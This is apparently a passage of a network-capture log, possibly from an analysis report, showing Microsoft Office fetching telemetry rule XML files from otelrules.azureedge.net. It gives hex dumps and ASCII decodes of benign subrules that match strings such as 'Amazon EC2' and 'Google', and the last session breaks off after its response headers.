                                                                                                                                                                                            2024-11-20 20:05:17 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            54192.168.2.44984913.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:17 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:17 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 400
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                            x-ms-request-id: bfe6d614-201e-006e-7a8c-3abbe3000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200517Z-1777c6cb754whff4hC1TEBcd6c00000008s0000000007v6m
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:17 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            55192.168.2.44985013.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:19 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:19 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 479
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                            x-ms-request-id: a1d815ed-301e-0096-3f8c-3ae71d000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200519Z-185f5d8b95c4vwv8hC1NYCy4v40000000avg00000000gu69
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:19 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            56192.168.2.44985113.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:19 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:19 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 425
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                            ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                            x-ms-request-id: 2db17697-001e-0017-3001-3b0c3c000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200519Z-r1d97b99577tssmjhC1TEB8kan00000009a0000000003rxg
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:19 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            57192.168.2.44985213.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:19 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:19 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 475
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                            x-ms-request-id: 7511d71d-801e-0083-6e8c-3af0ae000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200519Z-1777c6cb754dqf99hC1TEB5nps0000000a00000000002tnh
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:19 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            58192.168.2.44985313.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:19 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:19 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 448
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                            ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                            x-ms-request-id: 6841e066-001e-0065-2611-3b0b73000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200519Z-r1d97b99577656nchC1TEBk98c00000009eg000000003zyf
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:20 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            59192.168.2.44985413.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:19 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:20 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 491
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                            ETag: "0x8DC582B98B88612"
                                                                                                                                                                                            x-ms-request-id: e456cfdf-c01e-0014-248c-3aa6a3000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200520Z-1777c6cb754wcxkwhC1TEB3c6w00000009y000000000q2b4
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:20 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            60192.168.2.44985513.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:21 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:21 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:21 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 416
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                            ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                            x-ms-request-id: f9d2b1a4-b01e-003d-337e-3bd32c000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200521Z-r1d97b99577hc74hhC1TEBvbns000000094000000000kcc7
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:21 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            61192.168.2.44985613.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:21 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:22 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 479
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                            ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                            x-ms-request-id: a1cdeef9-f01e-0020-348c-3a956b000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200521Z-185f5d8b95c4vwv8hC1NYCy4v40000000as00000000143u7
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:22 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            62192.168.2.44985713.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:21 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:22 GMT
                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                            x-ms-request-id: c366b67a-401e-0083-1804-3b075c000000
                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                            x-azure-ref: 20241120T200522Z-r1d97b99577jlrkbhC1TEBq8d000000009a00000000024d6
                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            2024-11-20 20:05:22 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                            63192.168.2.44985813.107.246.63443
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-20 20:05:21 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                            2024-11-20 20:05:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 20 Nov 2024 20:05:22 GMT
                                                                                                                                                                                            Content-Type: text/xml
